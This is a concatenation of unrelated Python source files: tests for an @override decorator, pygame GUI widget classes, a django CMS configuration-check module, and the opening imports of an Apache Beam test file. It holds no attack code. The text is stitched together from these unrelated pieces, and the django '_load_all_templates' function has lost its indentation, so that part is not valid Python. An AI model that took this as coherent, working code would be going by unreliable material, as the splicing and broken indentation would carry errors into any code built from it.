            @__unit__.override
            @classmethod
            def class_florb(cls):
                pass

    def test_class_method__present__hiding_method_from_regular_base(self):
        Base = self._create_regular_class()
        class Foo(Base, Object):
            @__unit__.override
            @classmethod
            def class_florb(cls):
                pass

    def test_class_method__present__but_below_classmethod_decorator(self):
        # @override must sit ABOVE @classmethod; the reverse order is
        # rejected with a TypeError mentioning "@classmethod".
        Base = self._create_objective_class()
        with self.assertRaises(TypeError) as r:
            class Foo(Base):
                @classmethod
                @__unit__.override
                def class_florb(cls):
                    pass
        self.assertIn("@classmethod", str(r.exception))
class Override_StaticMethods(_Override):
    """Tests for @override on staticmethods."""

    def test_static_method__unnecessary(self):
        with self._assertRaisesUnnecessaryOverrideException():
            class Baz(Object):
                @__unit__.override
                @staticmethod
                def static_florb():
                    pass

    def test_static_method__missing(self):
        Base = self._create_objective_class()
        with self._assertRaisesMissingOverrideException():
            class Baz(Base):
                @staticmethod
                def static_florb():
                    pass

    def test_static_method__missing__hiding_method_from_regular_base(self):
        # see comment in analogous test case for instance methods
        Base = self._create_regular_class()
        with self._assertRaisesMissingOverrideException():
            class Baz(Base, Object):
                @staticmethod
                def static_florb():
                    pass

    def test_static_method__present(self):
        Base = self._create_objective_class()
        class Baz(Base):
            @__unit__.override
            @staticmethod
            def static_florb():
                pass

    def test_static_method__present__hiding_method_from_regular_base(self):
        Base = self._create_regular_class()
        class Baz(Base, Object):
            @__unit__.override
            @staticmethod
            def static_florb():
                pass
| |
import pygame
from pygame.locals import *
from util import debug, file_list, gamedir
from imagecache import ImageCache
from util import file_path
def render_text(text, size=32, color=(0, 0, 0), font=None):
    """Render *text* as an antialiased surface.

    Falls back to the game's default font (BLKCHCRY) at *size* when no
    *font* object is supplied.
    """
    if font is None:
        font = pygame.font.Font(file_path('fonts', 'BLKCHCRY.TTF'), size)
    rendered = font.render(str(text), 1, color)
    return rendered
def scrn_print(surface, text, x, y, size=32, color=(0, 0, 0)):
    """Draw *text* onto *surface*, centered at pixel position (x, y)."""
    rendered = render_text(text, size=size, color=color)
    pos = rendered.get_rect()
    pos.centerx, pos.centery = x, y
    surface.blit(rendered, pos)
class Label(pygame.sprite.DirtySprite):
    """A static one-line text sprite.

    ``value`` holds the displayed text; ``name`` is an empty identifier
    that callers may fill in.
    """
    def __init__(self, text, pos, layer=6, color=(255, 0, 0)):
        # Fixed: call super() on THIS class, not on DirtySprite itself.
        # The old super(pygame.sprite.DirtySprite, self).__init__() skipped
        # DirtySprite.__init__, leaving dirty/visible/blendmode unset.
        # super() runs first so _layer cannot be clobbered by it.
        super(Label, self).__init__()
        self._layer = layer
        self.image = render_text(text, size=16, color=color, font=None)
        self.rect = self.image.get_rect()
        self.rect.x = pos[0]
        self.rect.y = pos[1]
        self.name = ''
        self.value = text

    def delete(self):
        """Remove the label from all sprite groups."""
        self.kill()
class MouseOver(Label):
    """A Label rendered on an opaque highlight background (hover hint)."""

    def __init__(self, text, pos, layer=6):
        # Removed the dead ``self.__layer = layer`` assignment: the
        # name-mangled attribute was never read anywhere, and
        # Label.__init__ already records the layer.
        text = ' ' + text
        Label.__init__(self, text, pos, layer)
        # Re-compose the text onto a filled background surface.
        img = pygame.Surface((self.rect.w, self.rect.h))
        img.fill((209, 212, 144))
        img.blit(self.image, (0, 0))
        self.image = img
class Button(pygame.sprite.DirtySprite):
    """Clickable text button with rest / hover / pressed images.

    Registers itself with *eventstack* for "mouseover" and "button1";
    call ``delete()`` to unregister and remove the sprite.
    """
    def __init__(self, label, onclick, onclick_params, eventstack, imagecache,
                 pos=(0, 0), layer=2, name='', sendself=False, fontsize=16):
        self._layer = layer
        self.registered_events = []  # handles returned by register_event
        self.name = name
        # NOTE(review): super() is invoked on DirtySprite rather than Button,
        # which skips DirtySprite.__init__ -- confirm this is intentional.
        super(pygame.sprite.DirtySprite, self).__init__()
        button_rest = imagecache['button_rest']
        button_hi = imagecache['button_hi']
        button_click = imagecache['button_click']
        self.pos = pos
        self.onclick = onclick
        self.onclick_params = onclick_params
        self.sendself = sendself
        self.label = render_text(label, size=fontsize, color=(255, 255, 255))
        labelrect = self.label.get_rect()
        # Scale each state image to the label size plus padding (50px wide,
        # 12px tall) and stamp the label centered-ish onto it.
        self.button_rest = pygame.transform.smoothscale(
            button_rest, (labelrect.w + 50, labelrect.h + 12))
        self.button_rest.blit(self.label, (25, 6))
        self.button_hi = pygame.transform.smoothscale(
            button_hi, (labelrect.w + 50, labelrect.h + 12))
        self.button_hi.blit(self.label, (25, 6))
        self.button_click = pygame.transform.smoothscale(
            button_click, (labelrect.w + 50, labelrect.h + 12))
        self.button_click.blit(self.label, (25, 6))
        rect = self.button_rest.get_rect()
        self.eventstack = eventstack
        self.rect = pygame.Rect(pos[0], pos[1], rect.w, rect.h)
        self.registered_events.append(
            self.eventstack.register_event("mouseover", self, self.mouseover))
        self.registered_events.append(
            self.eventstack.register_event("button1", self, self.click))
        # Start in the rest state.
        self.mouseout(None)

    def mouseover(self, pos):
        # Switch to highlight image; "mouseout" is registered only once
        # hovered (note: that handle is NOT tracked in registered_events).
        self.image = self.button_hi
        self.eventstack.register_event("mouseout", self, self.mouseout)

    def mouseout(self, pos):
        self.image = self.button_rest
        self.image.convert()

    def click(self, pos):
        """Show the pressed image and invoke the callback, if any."""
        self.image = self.button_click
        if self.onclick is not None:
            if not self.sendself:
                self.onclick(*self.onclick_params)
            else:
                # Pass the button object itself first when sendself is set.
                self.onclick(self, *self.onclick_params)

    def delete(self):
        """Unregister tracked event handlers and remove from all groups."""
        for h in self.registered_events:
            self.eventstack.unregister_event(h)
        self.kill()
class BlitButton(Button):
    """A Button drawn from one cached image instead of rendered text."""

    def __init__(self, onclick, onclick_params, eventstack, imagecache,
                 imagekey, pos=(0, 0), layer=10, scale=0):
        self._layer = layer
        Button.__init__(self, '', onclick, onclick_params, eventstack,
                        imagecache, pos, layer)
        image = imagecache[imagekey].copy()
        if scale:
            image = pygame.transform.smoothscale(image, (scale, scale))
        # The same surface serves every button state.
        self.button_rest = image
        self.button_hi = image
        self.button_click = image
        self.image = image
        self.rect = image.get_rect()
        self.rect.topleft = pos
class ButtonArrow(BlitButton):
    """A BlitButton showing the cached 'arrow_<direction>' image."""

    def __init__(self, onclick, onclick_params, eventstack, imagecache,
                 direction, pos=(0, 0), layer=10):
        self._layer = layer
        image_key = 'arrow_%s' % direction
        BlitButton.__init__(self, onclick, onclick_params, eventstack,
                            imagecache, image_key, pos, layer)
class checkboxbtn(Button):
    """Check-box style button: each click toggles ``checked``.

    Inherits Button.delete(); only the "button1" event is registered here.
    """
    # Default (unchecked) state; click() rebinds ``checked`` per instance.
    checked = False

    def __init__(self, label, onclick, onclick_params, eventstack, imagecache,
                 pos=(0, 0), fontsize=16, layer=6, name='', sendself=False):
        self._layer = layer
        self.registered_events = []
        self.name = name
        # NOTE(review): Button.__init__ is bypassed entirely, and super() is
        # invoked on DirtySprite (skipping DirtySprite.__init__) -- confirm.
        super(pygame.sprite.DirtySprite, self).__init__()
        self.pos = pos
        self.sendself = sendself
        self.onclick = onclick
        self.onclick_params = onclick_params
        self.label = render_text(label, size=fontsize, color=(255, 0, 20))
        labelrect = self.label.get_rect()
        # One per-pixel-alpha surface per state: check image at the left,
        # label offset 30px to its right.
        self.checkedimg = pygame.Surface((labelrect.w + 30, 31),
                                         pygame.SRCALPHA, 32)
        self.uncheckedimg = pygame.Surface((labelrect.w + 30, 31),
                                           pygame.SRCALPHA, 32)
        self.checkedimg.convert_alpha()
        self.uncheckedimg.convert_alpha()
        self.checkedimg.blit(imagecache['checkbtn_checked'], (0, 0))
        self.uncheckedimg.blit(imagecache['checkbtn_unchecked'], (0, 0))
        self.checkedimg.blit(self.label, (30, 3))
        self.uncheckedimg.blit(self.label, (30, 3))
        rect = self.uncheckedimg.get_rect()
        self.rect = pygame.Rect(pos[0], pos[1], rect.w, rect.h)
        self.eventstack = eventstack
        self.registered_events.append(
            self.eventstack.register_event("button1", self, self.click))

    @property
    def value(self):
        return self.checked

    @property
    def image(self):
        # The drawn image always reflects the current checked state.
        if self.checked:
            return self.checkedimg
        else:
            return self.uncheckedimg

    def click(self, pos):
        """Toggle the checkbox and invoke the callback, if any."""
        self.checked = not self.checked
        if self.onclick is not None:
            if not self.sendself:
                self.onclick(*self.onclick_params)
            else:
                # Unlike Button.click, the new checked state is also passed.
                self.onclick(self, self.checked, *self.onclick_params)
class TextInput(pygame.sprite.DirtySprite):
    """Single-line text-entry sprite with a blinking cursor.

    Click to focus; keystrokes are handled by ``kb``.  ``prompt`` is shown
    until the first click when ``clearprompt`` is true.
    """
    def __init__(self, rect, fontsize, eventstack, prompt='',
                 clearprompt=True, layer=1, name='', onreturn=None,
                 onreturn_args=None):
        # Fixed: proper super() call (the old code invoked it on
        # DirtySprite, skipping DirtySprite.__init__), placed before
        # _layer so the layer value is not clobbered.
        super(TextInput, self).__init__()
        self.prompt = prompt
        self.clearprompt = clearprompt
        self.text = prompt
        self._layer = layer
        self.registered_events = []
        self.name = name
        self.onreturn = onreturn
        # Fixed: no shared mutable default argument.
        self.onreturn_args = [] if onreturn_args is None else onreturn_args
        self.rect = rect
        self.fontsize = fontsize
        self.eventstack = eventstack
        self.registered_events.append(
            self.eventstack.register_event("keydown", self, self.kb))
        self.registered_events.append(
            self.eventstack.register_event("button1", self, self.click))
        self.cur = False            # current cursor-blink phase
        self.cpos = len(self.text)  # cursor position within self.text
        self.counter = 0            # frame counter driving the blink
        self.capslock = False
        self.has_focus = False

    def get_text(self):
        """Return the entered text, or '' while only the prompt shows."""
        if self.text == self.prompt:
            return ''
        return self.text

    @property
    def value(self):
        return self.text

    @property
    def image(self):
        # Re-rendered on every access; the cursor glyph toggles roughly
        # every 10 frames while the widget has focus.
        self.counter += 1
        if (self.counter == 1 or self.counter % 10 == 0) and self.has_focus:
            self.cur = not self.cur
        cur = self.cur and '-' or '_'
        out = list(self.text)
        if self.cpos >= len(out):
            out.append(cur)
        else:
            out.insert(self.cpos, cur)
        surface = pygame.Surface((self.rect.w, self.rect.h))
        surface.fill((255, 255, 255))
        surface.blit(
            render_text(''.join(out), color=(0, 0, 0),
                        font=pygame.font.SysFont('monospace', self.fontsize)),
            (3, 3))
        return surface

    def kb(self, event):
        """Handle a keydown event while focused."""
        if not self.has_focus:
            return
        if event.key == K_BACKSPACE:
            # Fixed: delete only when a character precedes the cursor.
            # The old code used index cpos-1 unguarded inside a bare
            # except, so backspace at position 0 deleted the LAST
            # character (index -1), and the cursor never moved back.
            if self.cpos > 0:
                out = list(self.text)
                del out[self.cpos - 1]
                self.text = ''.join(out)
                self.cpos -= 1
        elif event.key == K_DELETE:
            # Delete the character under the cursor, if any.
            if self.cpos < len(self.text):
                out = list(self.text)
                del out[self.cpos]
                self.text = ''.join(out)
        elif event.key == K_CAPSLOCK:
            self.capslock = not self.capslock
        elif event.key == K_RETURN:
            self.has_focus = False
            if self.onreturn:
                self.onreturn(*self.onreturn_args)
        elif event.key == K_SPACE:
            self.text += ' '
        elif event.key == K_LEFT:
            if self.cpos > 0:
                self.cpos -= 1
        elif event.key == K_RIGHT:
            if self.cpos < len(self.text):
                self.cpos += 1
        else:
            new = event.unicode.upper() if self.capslock else event.unicode
            out = list(self.text)
            # list.insert clamps out-of-range indices, so no guard needed.
            out.insert(self.cpos, new)
            self.text = ''.join(out)
            self.cpos += 1
        # NOTE(review): the original flush-left source made the indent of
        # this ``return True`` ambiguous; treated here as "event consumed"
        # for every handled key while focused -- confirm against callers.
        return True

    def delete(self):
        """Unregister event handlers and remove the sprite from groups."""
        for handle in self.registered_events:
            self.eventstack.unregister_event(handle)
        self.kill()

    def click(self, pos):
        """Give the widget focus; clear the prompt on first click."""
        self.has_focus = True
        if self.clearprompt and self.text == self.prompt:
            self.text = ''
class Dropdown(pygame.sprite.DirtySprite):
    """Drop-down selection widget.

    Shows the current choice plus an arrow; clicking toggles an expanded
    list of choices, and clicking an entry selects it (optionally firing
    ``onselect``).

    Fixes over the previous revision: ``super()`` is called with ``Dropdown``
    so ``DirtySprite.__init__`` actually runs (the old call passed
    ``pygame.sprite.DirtySprite`` as the first argument, skipping it), and a
    stray unused ``counter`` local was removed from ``__init__``.
    """
    def __init__(self, eventstack, imagecache, fontsize, rect, choices, layer=7, choice='', onselect=None, name='', sendself=False):
        self._layer = layer
        super(Dropdown, self).__init__()
        self.name = name
        self.sendself = sendself
        self.onselect = onselect
        self.choicerects = {}   # choice -> screen rect, filled by mouseover()
        self.eventstack = eventstack
        self.fontsize = fontsize
        self.imagecache = imagecache
        # Collapsed rect (one row) and expanded rect (one row per choice + header).
        self.uprect = pygame.Rect(rect.x, rect.y, rect.w, rect.h)
        self.downrect = pygame.Rect(rect.x, rect.y, rect.w, rect.h * (len(choices) + 1))
        self.rect = self.uprect
        self.choices = choices
        self.choice = choice
        self.font = pygame.font.SysFont('monospace', self.fontsize)
        self.upsurface = pygame.Surface((self.uprect.w, self.uprect.h))
        self.dnsurface = pygame.Surface((self.downrect.w, self.downrect.h))
        self.upsurface.fill((255,255,255))
        self.arrow_down = pygame.transform.smoothscale(imagecache['arrow_down'], (32, self.rect.h))
        self.upsurface.blit(self.arrow_down, (rect.w - 30, 0))
        self.image = self.upsurface
        self.registered_events = []
        self.registered_events.append(self.eventstack.register_event("button1", self, self.click))
        self.registered_events.append(self.eventstack.register_event("mouseover", self, self.mouseover))
        # Pre-render the expanded list so it is ready the first time it opens.
        self.mouseover('force')
        self.down = False
        self.upsurface.blit(render_text(self.choice, font=self.font, color=(0,0,0)), (0,0))
    @property
    def value(self):
        # Currently selected choice string.
        return self.choice
    def itemsurface(self, choice, highlight=False):
        """Render one row of the expanded list; tinted when hovered."""
        surface = pygame.Surface((self.uprect.w, self.uprect.h))
        if highlight:
            surface.fill((170,178,255))
        else:
            surface.fill((170,178,181))
        surface.blit(render_text(choice, font=self.font, color=(0,0,0)), (0,0))
        return surface
    def delete(self):
        """Unregister all event handlers and remove the sprite."""
        for h in self.registered_events:
            self.eventstack.unregister_event(h)
        self.kill()
    def mouseover(self, pos):
        """Redraw the expanded list, highlighting the hovered row.

        ``pos`` is an (x, y) tuple, or any string (e.g. 'force') to redraw
        unconditionally with no highlight.
        """
        x, y = 0, 0
        if not isinstance(pos, str):
            x, y = pos
        counter = 1
        if isinstance(pos, str) or (self.down and y > self.uprect.y + self.uprect.h):
            for c in self.choices:
                choicerect = pygame.Rect(self.uprect.x, self.uprect.y + self.uprect.h * counter, self.downrect.w, self.uprect.h)
                if choicerect.collidepoint(x, y):
                    choicesurface = self.itemsurface(c, True)
                else:
                    choicesurface = self.itemsurface(c)
                self.dnsurface.blit(choicesurface, (0, self.uprect.h * counter))
                self.choicerects[c] = choicerect
                counter += 1
    def click(self, pos):
        """Select the clicked row (when expanded), then toggle open/closed."""
        x, y = pos
        if self.down and y > self.uprect.y + self.uprect.h:
            for k, v in self.choicerects.items():
                if v.collidepoint(x, y):
                    self.choice = k
                    # Redraw the collapsed header with the new choice.
                    self.upsurface.fill((255,255,255))
                    self.upsurface.blit(render_text(k, font=self.font, color=(0,0,0)), (0,0))
                    self.upsurface.blit(self.arrow_down, (self.uprect.w - 30, 0))
                    if self.onselect is not None:
                        if not self.sendself:
                            self.onselect(self.choice)
                        else:
                            self.onselect(self, self.choice)
                    break
        self.down = not self.down
    def update(self):
        """Swap image/rect between the collapsed and expanded presentations."""
        self.dnsurface.blit(self.upsurface, (0,0))
        if self.down:
            self.image = self.dnsurface
            self.rect = self.downrect
        else:
            self.image = self.upsurface
            self.rect = self.uprect
| |
# -*- coding: utf-8 -*-
from __future__ import with_statement
from contextlib import contextmanager
import inspect
import os
from itertools import chain
from django.conf import settings
from django.template import Lexer, TOKEN_BLOCK
from django.utils.decorators import method_decorator
from django.utils.termcolors import colorize
from sekizai.helpers import validate_template
from cms import constants
from cms.utils import get_cms_setting
from cms.utils.compat.dj import get_app_paths
SUCCESS = 1
WARNING = 2
ERROR = 3
SKIPPED = 4
CHECKERS = []
class FileOutputWrapper(object):
    """
    Adapts a pair of file-like objects (anything with a ``write`` method)
    to the reporting API consumed by the check function further down in
    this module.

    Alternative implementations must expose the same public surface:

    counters:
        errors / successes / warnings / skips -- integer tallies
        successful -- True when no errors were recorded

    methods:
        write_line(message=''): writes a message to stdout
        write_stderr_line(message=''): writes a message to stderr
        success(message): reports and registers a successful check
        error(message): reports and registers an error
        warn(message): reports and registers a warning
        skip(message): reports and registers a skipped check
        section(title): context manager opening a new report section
            (see FileSectionWrapper for the section API)
    """
    def __init__(self, stdout, stderr):
        self.stdout = stdout
        self.stderr = stderr
        self.section_wrapper = FileSectionWrapper
        # Result tallies, accumulated as checks report in.
        self.errors = 0
        self.successes = 0
        self.warnings = 0
        self.skips = 0
    def colorize(self, msg, opts=(), **kwargs):
        # Thin hook around django's colorize so subclasses can disable color.
        return colorize(msg, opts=opts, **kwargs)
    def write(self, message):
        self.stdout.write(message)
    def write_line(self, message=''):
        self.write(u'%s\n' % message)
    def write_stderr(self, message):
        self.stderr.write(message)
    def write_stderr_line(self, message=''):
        self.write_stderr(u'%s\n' % message)
    def success(self, message):
        self.successes += 1
        tag = self.colorize('[OK]', fg='green', opts=['bold'])
        self.write_line(u'%s %s' % (message, tag))
    def error(self, message):
        self.errors += 1
        tag = self.colorize('[ERROR]', fg='red', opts=['bold'])
        self.write_stderr_line(u'%s %s' % (message, tag))
    def warn(self, message):
        self.warnings += 1
        tag = self.colorize('[WARNING]', fg='yellow', opts=['bold'])
        self.write_stderr_line(u'%s %s' % (message, tag))
    def skip(self, message):
        self.skips += 1
        tag = self.colorize('[SKIP]', fg='blue', opts=['bold'])
        self.write_line(u'%s %s' % (message, tag))
    @method_decorator(contextmanager)
    def section(self, title):
        # Underlined section heading, then a blank line.
        self.write_line(self.colorize(title, opts=['bold']))
        self.write_line(self.colorize('=' * len(title), opts=['bold']))
        self.write_line()
        wrapper = self.section_wrapper(self)
        try:
            yield wrapper
        except:
            self.error('Checker failed, see traceback')
            raise
        # Fold the section's tallies into the global counters.
        self.errors += wrapper.errors
        self.successes += wrapper.successes
        self.warnings += wrapper.warnings
        self.skips += wrapper.skips
        self.write_line('')
    @property
    def successful(self):
        return not self.errors
class FileSectionWrapper(FileOutputWrapper):
    """
    Used from FileOutputWrapper to report checks in a section.
    If you want to provide your own output class, you may want to subclass
    this class for the section reporting too. If you want to use your own,
    you must define at least the same API as FileOutputWrapper, as well
    as these four additional methods:
    finish_success(message): End the section (successfully)
    finish_error(message): End the section with errors
    finish_warning(message): End this section with a warning
    finish_skip(message): End this (skipped) section
    """
    def __init__(self, wrapper):
        super(FileSectionWrapper, self).__init__(wrapper.stdout, wrapper.stderr)
        self.wrapper = wrapper
    def write_line(self, message=''):
        # Section lines render as indented bullets under the section heading.
        self.write(u' - %s\n' % message)
    def write_stderr_line(self, message=''):
        self.write_stderr(u' - %s\n' % message)
    def finish_success(self, message):
        self.wrapper.write_line()
        self.wrapper.success(message)
    def finish_error(self, message):
        self.wrapper.write_line()
        self.wrapper.error(message)
    def finish_warning(self, message):
        self.wrapper.write_line()
        # Bug fix: FileOutputWrapper's method is ``warn``; the previous call
        # to the non-existent ``warning`` raised AttributeError.
        self.wrapper.warn(message)
    def finish_skip(self, message):
        # Bug fix: ``write_lin`` was a typo for ``write_line``.
        self.wrapper.write_line()
        self.wrapper.skip(message)
def define_check(func):
    """
    Helper decorator to register a check function.

    The decorated function is appended to the module-level ``CHECKERS``
    registry (executed in order by ``check()``) and returned unchanged.
    """
    CHECKERS.append(func)
    return func
@define_check
def check_sekizai(output):
    """Check that django-sekizai is installed and configured correctly."""
    with output.section("Sekizai") as section:
        if 'sekizai' not in settings.INSTALLED_APPS:
            section.error("Sekizai is not installed, could not find 'sekizai' in INSTALLED_APPS")
        else:
            section.success("Sekizai is installed")
        if 'sekizai.context_processors.sekizai' not in settings.TEMPLATE_CONTEXT_PROCESSORS:
            section.error("Sekizai template context processor is not installed, could not find 'sekizai.context_processors.sekizai' in TEMPLATE_CONTEXT_PROCESSORS")
        else:
            section.success("Sekizai template context processor is installed")
        # Every concrete CMS template must declare the 'js' and 'css' namespaces.
        for template, _ in get_cms_setting('TEMPLATES'):
            if template == constants.TEMPLATE_INHERITANCE_MAGIC:
                # The inheritance marker is not a real template file.
                continue
            if validate_template(template, ['js', 'css']):
                section.success("Sekizai namespaces 'js' and 'css' found in %r" % template)
            else:
                section.error("Sekizai namespaces 'js' and 'css' not found in %r" % template)
        if not section.successful:
            section.finish_error("Sekizai configuration has errors")
        else:
            section.finish_success("Sekizai configuration okay")
@define_check
def check_i18n(output):
    """
    Validate i18n settings: new-style CMS_LANGUAGES, language codes rather
    than locales, an integer SITE_ID, and deprecated language settings.
    """
    with output.section("Internationalization") as section:
        # New-style CMS_LANGUAGES is a dict; the legacy form was a tuple.
        if isinstance(getattr(settings, 'CMS_LANGUAGES', {}), dict):
            section.success("New style CMS_LANGUAGES")
        else:
            section.warn("Old style (tuple based) CMS_LANGUAGES, please switch to the new (dictionary based) style")
        # Language *codes* use hyphens ('en-us'); an underscore indicates a
        # locale name ('en_US'), which is invalid here.
        if getattr(settings, 'LANGUAGE_CODE', '').find('_') > -1:
            section.warn("LANGUAGE_CODE must contain a valid language code, not a locale (e.g.: 'en-us' instead of 'en_US'): '%s' provided" % getattr(settings, 'LANGUAGE_CODE', ''))
        for lang in getattr(settings, 'LANGUAGES', ()):
            if lang[0].find('_') > -1:
                section.warn("LANGUAGES must contain valid language codes, not locales (e.g.: 'en-us' instead of 'en_US'): '%s' provided" % lang[0])
        if isinstance(settings.SITE_ID, int):
            # CMS_LANGUAGES maps site id -> language entries; skip the
            # non-integer meta keys ('default' etc.).
            for site, items in get_cms_setting('LANGUAGES').items():
                if type(site) == int:
                    for lang in items:
                        if lang['code'].find('_') > -1:
                            section.warn("CMS_LANGUAGES entries must contain valid language codes, not locales (e.g.: 'en-us' instead of 'en_US'): '%s' provided" % lang['code'])
        else:
            section.error("SITE_ID must be an integer, not %r" % settings.SITE_ID)
        # These settings were replaced by new-style CMS_LANGUAGES.
        for deprecated in ['CMS_HIDE_UNTRANSLATED', 'CMS_LANGUAGE_FALLBACK', 'CMS_LANGUAGE_CONF', 'CMS_SITE_LANGUAGES', 'CMS_FRONTEND_LANGUAGES']:
            if hasattr(settings, deprecated):
                section.warn("Deprecated setting %s found. This setting is now handled in the new style CMS_LANGUAGES and can be removed" % deprecated)
@define_check
def check_deprecated_settings(output):
    """Warn about settings django CMS no longer reads at all."""
    with output.section("Deprecated settings") as section:
        present = [name for name in ('CMS_FLAT_URLS', 'CMS_MODERATOR')
                   if hasattr(settings, name)]
        for deprecated in present:
            section.warn("Deprecated setting %s found. This setting is no longer in use and can be removed" % deprecated)
        if not present:
            section.skip("No deprecated settings found")
@define_check
def check_plugin_instances(output):
    """Report plugin instances whose type is uninstalled or unsaved."""
    from cms.management.commands.subcommands.list import plugin_report
    with output.section("Plugin instances") as section:
        report = plugin_report()
        section.success("Plugin instances of %s types found in the database" % len(report))
        for plugin_type in report:
            # Instances whose plugin class is no longer installed are orphans.
            if not plugin_type["model"]:
                section.error("%s has instances but is no longer installed" % plugin_type["type"])
            # Unsaved instances indicate interrupted editing sessions.
            if plugin_type["unsaved_instances"]:
                section.error("%s has %s unsaved instances" % (plugin_type["type"], len(plugin_type["unsaved_instances"])))
        if not section.successful:
            section.finish_error("There are potentially serious problems with the plugins in your database. \nEven if your site works, you should run the 'manage.py cms list plugins' \ncommand and then the 'manage.py cms delete_orphaned_plugins' command. \nThis will alter your database; read the documentation before using it.")
        else:
            section.finish_success("The plugins in your database are in good order")
@define_check
def check_copy_relations(output):
    """
    Warn about plugin / extension models that carry relations (many-to-many
    or incoming foreign keys) without defining a ``copy_relations`` method,
    since such relations are lost when the object is copied.
    """
    from cms.plugin_pool import plugin_pool
    from cms.extensions import extension_pool
    from cms.extensions.models import BaseExtension
    from cms.models.pluginmodel import CMSPlugin
    # Render a class as 'module.ClassName' for readable messages.
    c_to_s = lambda klass: '%s.%s' % (klass.__module__, klass.__name__)
    def get_class(method_name, model):
        # Walk the MRO and return the class that actually defines method_name
        # (None when nothing in the hierarchy defines it).
        for cls in inspect.getmro(model):
            if method_name in cls.__dict__:
                return cls
        return None
    with output.section('Presence of "copy_relations"') as section:
        plugin_pool.discover_plugins()
        for plugin in plugin_pool.plugins.values():
            plugin_class = plugin.model
            # If copy_relations is defined below CMSPlugin in the MRO, the
            # plugin author has handled copying; CMSPlugin itself is exempt.
            if get_class('copy_relations', plugin_class) is not CMSPlugin or plugin_class is CMSPlugin:
                # this class defines a ``copy_relations`` method, nothing more
                # to do
                continue
            for rel in plugin_class._meta.many_to_many:
                section.warn('%s has a many-to-many relation to %s,\n    but no "copy_relations" method defined.' % (
                    c_to_s(plugin_class),
                    c_to_s(rel.model),
                ))
            for rel in plugin_class._meta.get_all_related_objects():
                # Incoming FKs from other CMSPlugin subclasses are handled by
                # the plugin framework; anything else needs copy_relations.
                if rel.model != CMSPlugin:
                    section.warn('%s has a foreign key from %s,\n    but no "copy_relations" method defined.' % (
                        c_to_s(plugin_class),
                        c_to_s(rel.model),
                    ))
        for extension in chain(extension_pool.page_extensions, extension_pool.title_extensions):
            # Same check for page/title extensions, relative to BaseExtension.
            if get_class('copy_relations', extension) is not BaseExtension:
                # OK, looks like there is a 'copy_relations' defined in the
                # extension... move along...
                continue
            for rel in extension._meta.many_to_many:
                section.warn('%s has a many-to-many relation to %s,\n    but no "copy_relations" method defined.' % (
                    c_to_s(extension),
                    c_to_s(rel.related.parent_model),
                ))
            for rel in extension._meta.get_all_related_objects():
                if rel.model != extension:
                    section.warn('%s has a foreign key from %s,\n    but no "copy_relations" method defined.' % (
                        c_to_s(extension),
                        c_to_s(rel.model),
                    ))
        if not section.warnings:
            section.finish_success('All plugins and page/title extensions have "copy_relations" method if needed.')
        else:
            # NOTE(review): this branch reports missing copy_relations but
            # still ends with finish_success (warnings were tallied above) --
            # confirm finish_warning was not intended here.
            section.finish_success('Some plugins or page/title extensions do not define a "copy_relations" method.\nThis might lead to data loss when publishing or copying plugins/extensions.\nSee https://django-cms.readthedocs.org/en/latest/extending_cms/custom_plugins.html#handling-relations or https://django-cms.readthedocs.org/en/latest/extending_cms/extending_page_title.html#handling-relations.')
def _load_all_templates(directory):
"""
Loads all templates in a directory (recursively) and yields tuples of
template tokens and template paths.
"""
if os.path.exists(directory):
for name in os.listdir(directory):
path = os.path.join(directory, name)
if os.path.isdir(path):
for template in _load_all_templates(path):
yield template
elif path.endswith('.html'):
with open(path, 'rb') as fobj:
source = fobj.read().decode(settings.FILE_CHARSET)
lexer = Lexer(source, path)
yield lexer.tokenize(), path
@define_check
def deprecations(output):
    """Scan every template directory for the removed placeholder_tags library."""
    # deprecated placeholder_tags scan (1 in 3.1)
    templates_dirs = list(getattr(settings, 'TEMPLATE_DIRS', []))
    for app_path in get_app_paths():
        templates_dirs.append(os.path.join(app_path, 'templates'))
    with output.section('Usage of deprecated placeholder_tags') as section:
        for template_dir in templates_dirs:
            for tokens, path in _load_all_templates(template_dir):
                for token in tokens:
                    if token.token_type != TOKEN_BLOCK:
                        continue
                    bits = token.split_contents()
                    # Looking for "{% load ... placeholder_tags ... %}".
                    if bits[0] == 'load' and 'placeholder_tags' in bits:
                        section.warn(
                            'Usage of deprecated template tag library '
                            'placeholder tags in template %s' % path
                        )
def check(output):
    """
    Checks the configuration/environment of this django CMS installation.
    'output' should be an object that provides the same API as FileOutputWrapper.
    Returns whether the configuration/environment are okay (has no errors)
    """
    # Boxed banner around the title.
    title = "Checking django CMS installation"
    border = '*' * len(title)
    output.write_line(output.colorize(border, opts=['bold']))
    output.write_line(output.colorize(title, opts=['bold']))
    output.write_line(output.colorize(border, opts=['bold']))
    output.write_line()
    # Run every check registered via @define_check, in registration order.
    for checker in CHECKERS:
        checker(output)
        output.write_line()
    with output.section("OVERALL RESULTS"):
        # Per-severity tallies; errors/warnings go to stderr.
        if output.errors:
            output.write_stderr_line(output.colorize("%s errors!" % output.errors, opts=['bold'], fg='red'))
        if output.warnings:
            output.write_stderr_line(output.colorize("%s warnings!" % output.warnings, opts=['bold'], fg='yellow'))
        if output.skips:
            output.write_line(output.colorize("%s checks skipped!" % output.skips, opts=['bold'], fg='blue'))
        output.write_line(output.colorize("%s checks successful!" % output.successes, opts=['bold'], fg='green'))
        output.write_line()
        # Final verdict: errors trump warnings, warnings trump success.
        if output.errors:
            output.write_stderr_line(output.colorize('Please check the errors above', opts=['bold'], fg='red'))
        elif output.warnings:
            output.write_stderr_line(output.colorize('Installation okay, but please check warnings above', opts=['bold'], fg='yellow'))
        else:
            output.write_line(output.colorize('Installation okay', opts=['bold'], fg='green'))
    return output.successful
| |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Unit tests for BigQuery file loads utilities."""
# pytype: skip-file
from __future__ import absolute_import
import logging
import os
import random
import sys
import time
import unittest
import mock
from hamcrest.core import assert_that as hamcrest_assert
from hamcrest.core.core.allof import all_of
from hamcrest.core.core.is_ import is_
from nose.plugins.attrib import attr
from parameterized import param
from parameterized import parameterized
import apache_beam as beam
from apache_beam.io.filebasedsink_test import _TestCaseWithTempDirCleanUp
